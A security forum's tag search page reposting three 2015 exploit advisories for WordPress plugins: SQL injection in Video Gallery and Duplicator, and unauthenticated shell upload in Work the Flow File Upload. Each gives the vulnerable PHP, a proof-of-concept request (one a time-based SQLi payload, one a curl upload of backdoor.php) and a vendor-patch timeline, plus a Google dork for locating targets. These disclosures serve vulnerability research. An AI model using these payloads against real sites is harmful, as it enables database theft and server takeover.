Jump to content

Search the Community

Showing results for tags '######################'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. ###################### # Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Video Gallery - Best YouTube and Vimeo Video Gallery Plugin # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense # Date : 2015-04-04 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from SQL injection Location file: /contus-video-gallery/hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); $vid = $_GET['vid']; is not sanitized ###################### # PoC http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[sqli] ###################### # Vulnerability Disclosure Timeline: 2015-04-04: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (same version number) 2015-04-13: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpvideogallery28-sql.txt
  2. ###################### # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Duplicator - Copy, Move, Clone or Backup your WordPress # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip # Date : 2015-04-08 # Tested on : Linux / Mozilla Firefox ###################### # Description Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability Location file: /view/actions.php This is the bugged ajax functions wp_ajax_duplicator_package_delete: function duplicator_package_delete() { DUP_Util::CheckPermissions('export'); try { global $wpdb; $json = array(); $post = stripslashes_deep($_POST); $tblName = $wpdb->prefix . 'duplicator_packages'; $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; $list = explode(",", $postIDs); $delCount = 0; if ($postIDs != null) { foreach ($list as $id) { $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); if ($getResult) { $row = $getResult[0]; $nameHash = "{$row['name']}_{$row['hash']}"; $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); if ($delResult != 0) { $post['duplicator_delid'] variable is not sanitized A authorized user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF) ###################### # PoC http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) ###################### # Vulnerability Disclosure Timeline: 2015-04-08: Discovered vulnerability 2015-04-08: Vendor Notification 2015-04-09: Vendor Response/Feedback 2015-04-10: Vendor Send Fix/Patch 2015-04-10: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpduplicator-sqlxsrf.txt
  3. ###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpworktheflow252-shell.txt
×
×
  • Create New...